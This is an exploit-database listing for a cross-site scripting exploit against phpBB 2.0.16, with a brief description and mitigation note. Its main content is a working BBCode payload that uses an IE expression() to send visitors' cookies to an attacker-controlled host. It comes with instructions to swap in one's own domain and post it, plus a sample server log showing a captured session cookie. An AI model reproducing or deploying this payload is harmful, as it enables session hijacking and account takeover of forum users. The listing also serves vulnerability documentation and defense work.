header-logo
Suggest Exploit
vendor:
phpBB
by:
D|ablo CCTEAM
7.5
CVSS
HIGH
Cross-Site Scripting (XSS)
79
CWE
Product Name: phpBB
Affected Version From: 2.0.16
Affected Version To: 2.0.16
Patch Exists: YES
Related CWE: N/A
CPE: a:phpbb:phpbb:2.0.16
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

CCTEAM PhpBB 2.0.16 XSS EXPLOIT

This exploit allows an attacker to inject malicious JavaScript code into a vulnerable web application. The malicious code is executed when a user visits the vulnerable page. This exploit targets PhpBB 2.0.16, a popular open source forum software. The malicious code is injected into the application using a specially crafted URL.

Mitigation:

Input validation should be used to prevent malicious code from being injected into the application. Additionally, the application should be kept up to date with the latest security patches.
Source

Exploit-DB raw data:

/*
1) Change milw0rm.com to your domain.com
2) Post the below code into a new message.

Example Output:
***.**.***.*** - - [09/Jul/2005:03:09:13 -0500] 
"GET /cgi-bin/shell.jpg?phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%223%22%3B%7D;%20phpbb2mysql_sid=898eeaa6ea3c9848a60121d3450a1287;%20phpbb2mysql_t=a%3A1%3A%7Bi%3A3%3Bi%3A1120845509%3B%7D HTTP/1.1" 404 305 "http://tester/phpBB2/viewtopic.php?t=3"

/str0ke
*/


******************************************************************************************************
*					CCTEAM PhpBB 2.0.16 XSS EXPLOIT                              *
*                                           Powered by D|ablo CCTEAM                                 *
******************************************************************************************************
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]

******************************************************************************************************
*				               http://ccteam.ru/                                     *
*                                             http://defacers.ru/                                    *
******************************************************************************************************

# milw0rm.com [2005-07-08]

Navigation

Suggest Exploit

Services By CQR